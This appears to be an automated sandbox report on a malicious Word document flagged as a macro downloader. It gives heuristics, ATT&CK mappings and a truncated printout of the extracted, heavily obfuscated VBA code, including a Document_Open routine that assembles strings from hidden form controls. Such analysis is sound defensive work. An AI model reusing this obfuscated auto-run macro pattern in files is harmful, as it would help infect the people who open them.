MALICIOUS
202
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The file contains VBA macros, specifically a Document_Open macro which is a common technique for executing malicious code upon opening the document. The macro is heavily obfuscated, making its exact function difficult to determine, but the presence of GetObject calls and the ClamAV detection suggest it's a downloader. The macro itself is the primary IOC, as it contains the malicious logic.
Heuristics 6
-
ClamAV: Doc.Downloader.Generic-7469262-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Generic-7469262-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 13063 bytes |
SHA-256: 4bc68be9c2fca5d56d9f715a70f7fab5a0ed833679ed8c1786794d7a14e97821 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Fwbejxmnpj"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "Vkzimturjeenc, 0, 0, MSForms, TextBox"
Private Sub Document_open()
Dim Igsepqmehcbg As Double
Dim Rdtprsexwwvk As Boolean
Ieoffsnrpvso = Jelhfrhtsx
Nlkwjelqvc = (Ahgaoxxcdsnsk)
Nnpmqzueb = 814
Dim Mocxrhqphxkh As String
Achvyrlwyxdg = "Vitae nemo."
Dim Wfcftvljagafc As Double
Dim Hdgkrpxnj As Boolean
Dim Hqpetkrstbu As Boolean
Jjrbbuspqpq = (329)
Dim Wzhystcfnutvm As String
Dim Jbemysahxvm As Double
Zqazkworku = Civpygpe
Dim Pldvevrkc As String
Dim Rfwuukpbw As Boolean
Dim Ulvkeszpx As Double
Sbovorsza = (Wlcyuevz)
Hirsauqzk = ("Voluptas dicta voluptas eveniet velit quia.")
Vlnvfywxjw = (Qpkhgxvtxhz)
Dim Xdnxbaqfubzp As Integer
Fzbtkiuacqm = Otlnmbbh
Hbxnnickfa
Dim Ypfkuntosohqg As Boolean
Dim Uuwuwqrisaix As Boolean
Smhocapyki = Yaxkzbgit
Vtihhnjlqpf = (Abeudvjo)
Rqlhbgrvqsv = 161
Dim Utilawyttzwk As Integer
Lexpcofqqvfif = "Et aut dolorem."
Dim Oifofkbvkjri As String
Dim Qoxcjgrscsxpd As Boolean
Dim Frrzaerrws As Double
Jnglglszhi = (175)
Dim Sbwfmqqhyiera As Double
Dim Uyxakwwhevhr As String
Dfxlugyhme = Flajplxr
Dim Khvawtrk As String
Dim Mwvdgffbvmmsu As Boolean
Dim Khvgwtmmcvp As Integer
Keqczgpjqxck = (Wlormmjlmveig)
Siqokrqwks = ("Annie")
Gujtvqwpandd = (Yruyraozxp)
Dim Vefpezyscrcb As Boolean
Jkifenkztzbm = Ehwuiausklj
End Sub
Attribute VB_Name = "Camxdyzasov"
Attribute VB_Base = "0{68A08007-2EAE-489F-919A-1C699FE87B53}{A0DE910C-662B-4B56-98C9-1ADFD1F10E64}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Zohvecnk"
Function Aqxdtbyhiyvx()
Dim Qgrtpykc As Double
Dim Whtrphlwlmia As String
Hjjrvjsswb = Fnlyuonnuoq
Ahnferqqilfo = (Maelslzcx)
Sunbottvwub = 609
Dim Skqzxbfjag As Integer
Qcydvyjbsl = "Soluta voluptatem sed accusantium dolorum est distinctio labore et maxime."
Dim Ptsmtwmk As Integer
Dim Tiuzewfdrnmp As Double
Dim Urbwrdugnnk As Integer
Tpeuprzjqi = (865)
Dim Nwotjqzvbrbv As Boolean
Dim Rxmvhoanlont As Integer
Yhejfcehfndxk = Bnjewzcwv
Dim Tzkafptcx As Integer
Dim Sqnokrzrkds As Boolean
Dim Aepzywkjix As String
Wfhndilmo = (Qipkxdqebraa)
Tdajeksd = ("Placeat voluptatibus natus.")
Mrdgugvvfly = (Mnfrtinveg)
Dim Ekcjlamzax As Boolean
Jjuwfupb = Ovysyvvthlqw
Usapwstupbld = Fwbejxmnpj.Vkzimturjeenc
Dim Jzerzexnxts As Double
Dim Vwkayxoxqsfp As Double
Sheqirwlow = Rxctseirazn
Uupshycsuegs = (Jyjioskfru)
Bgpjstivowhsh = 135
Dim Vxsvaquzt As Double
Ydlpduvhxvc = "At dolorem asperiores facere."
Dim Njhvmrrbrn As String
Dim Yywjhhwtb As String
Dim Kytmxzajt As Double
Iriymbyph = (207)
Dim Hfvyxqogrjsdw As String
Dim Eucrdvurqfai As Integer
Ummpnroqycjv = Xpnmbtxenqmbn
Dim Twhtlxxgo As Integer
Dim Fnwzhiiyt As Double
Dim Ohaxpzwdleal As Double
Cbayzjzdw = (Injdsotebi)
Ohxkkxbecrue = ("Clay")
Aurslkloh = (Atpghcxchm)
Dim Zogvjhqt As Integer
Lozmjwphaalxk = Yupwczujrs
Cinneipqscq = Usapwstupbld + Camxdyzasov.Ompxvrkfqlvl + Camxdyzasov.Ydootfwvx + Camxdyzasov.Oiuvdbgtedkjs
Dim Myfyslebmximg As Double
Dim Ntoytxjyf As Double
Ajldeoleezyh = Lttkiirwfw
Vozcaajxk = (Jsubcyhplpp)
Qnwgdeep = 659
Dim Tweczxyayqdjs As Boolean
Oxyghrfgv = "Garrett"
Dim Dcugqazvafx As Boolean
Dim Rmprqahvi As String
Dim Ggjcgnpjrlu As String
Racjwnbrb = (172)
Dim Ucopudsvcfz As Boolean
Dim Xpmpnewxqizq As String
Yuyxfquhezzpn = Uaspkmhbmdwtr
Dim Ozvgtbdhuuxq As String
Dim Pyrdxwigbol As String
Dim Muixdcklathz As Integer
Syvmwvnwefp = (Lhyhucirn)
Unacofkeafpig = ("Reiciendis cumque.")
Vfpqchjtzdc = (Wpyfmxsivl)
Dim Vktcvzrgfgdbx As Double
Ktaymsxikhk = Igathqgxq
Tuimwnybwuiad = Cinneipqscq + Camxdyzasov.Vwczvberfmi + Camxdyzasov
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.